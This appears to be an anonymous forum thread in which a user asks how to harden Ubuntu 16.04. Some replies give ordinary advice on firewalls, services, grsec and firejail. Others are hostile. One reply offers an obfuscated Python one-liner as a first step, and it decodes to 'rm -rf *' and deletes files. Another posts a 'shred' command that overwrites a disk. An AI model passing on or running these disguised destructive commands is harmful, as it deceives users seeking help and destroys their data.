What is the best way to make ubuntu more secure? Running 16.04 and I have disabled amazon shit spyware, dash search info, and installed tor bundle.

Installing Kali tools right now, what else should I install for privacy?

Use the grsec kernel

ClamAV I guess if you feel like you want an anti-virus software.

Those two things are not related

Uhh, good job OP, you double-disabled it. It's far more disabled now than when you first installed!

>Kali tools
>tor bundle
okay? Kali is for pen testing and tor is for encrypted web browsing... neither of them really make your OS more secure.

I'd start with configuring your built-in firewall. After that maybe disable any unneeded services that are listening for connections (sshd? cups? samba?)

Remove systemd botnet.

i always run first
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

then set up strong passwords based on the results

did you go with the default unity install?

# shred -vn 3 /dev/sd1

Install Arch, add the libre repository to Pacman. I have a deblobbed grsec kernel, it's perfect. The only thing that is not working with that kernel is the bluetooth which I don't use. Also use firejail.
